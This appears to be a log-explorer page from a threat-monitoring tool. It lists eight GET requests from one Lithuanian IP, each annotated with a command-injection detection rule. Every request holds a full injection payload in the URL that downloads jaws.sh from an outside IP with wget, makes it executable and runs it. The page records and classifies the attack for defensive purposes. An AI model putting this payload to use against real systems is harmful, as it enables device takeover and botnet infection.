← Back to IP report
Log Explorer
Fact drill-down for
141.98.11.94
Risk
4
LOW
Scope
All time
All-time facts
8
In-scope
8
Filtered
8
Seen
2025-03-24
→
2025-03-24
Freestyle query (contains)
Time (days, optional)
Page size
25
50
100
200
Apply
Reset (all-time)
Active
(none)
Clear
Faceted filters (facts-based)
exact core + snapshot + optional start/end
Annotation facets
Annotator (exact)
(any)
base — 4
cmdi — 4
Severity (exact)
(any)
(none) — 4
28 — 4
Label (exact)
(any)
cmdi — 4
observed — 4
HTTP facets
Method (exact, case-insensitive)
(any)
GET — 8
HTTP status (exact)
(any)
301 — 8
Snapshot facets
Subnet (exact)
(any)
141.98.11.0/24 — 8
ASN (exact)
(any)
209605 — 8
Country / Region / City (exact)
(any country)
Lithuania — 8
(any region)
Vilnius — 8
(any city)
Vilnius — 8
Org contains (ip_org or as_org_name)
Custom time window (optional override)
Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.
Start
End
Tip: keep windows tight when you need speed, but the default is fact-complete.
Top annotators (facts, in-scope)
base
4
cmdi
4
Top labels (facts, in-scope)
cmdi
4
observed
4
Click a pill to apply it as a filter.
Annotated access events
Showing page
1
/
1
— total
8
rows
← Prev
Next →
#
1
2025-03-24 12:13:27
event
3458512
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
2
2025-03-24 12:13:27
event
3458512
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
3
2025-03-24 11:06:15
event
3457909
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
4
2025-03-24 11:06:15
event
3457909
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
5
2025-03-24 03:50:07
event
3343249
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
6
2025-03-24 03:50:07
event
3343249
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
7
2025-03-24 03:25:02
event
3343050
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm -rf j;nohup wget http:/\x5C/89.144.32.113/jaws.sh;chmod 777 jaws.sh;./jaws.s'
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
#
8
2025-03-24 03:25:02
event
3343050
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
141.98.11.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Vilnius, Vilnius
org
—
×
This is a custom alert message.
×
Confirm Action
Are you sure you want to proceed?
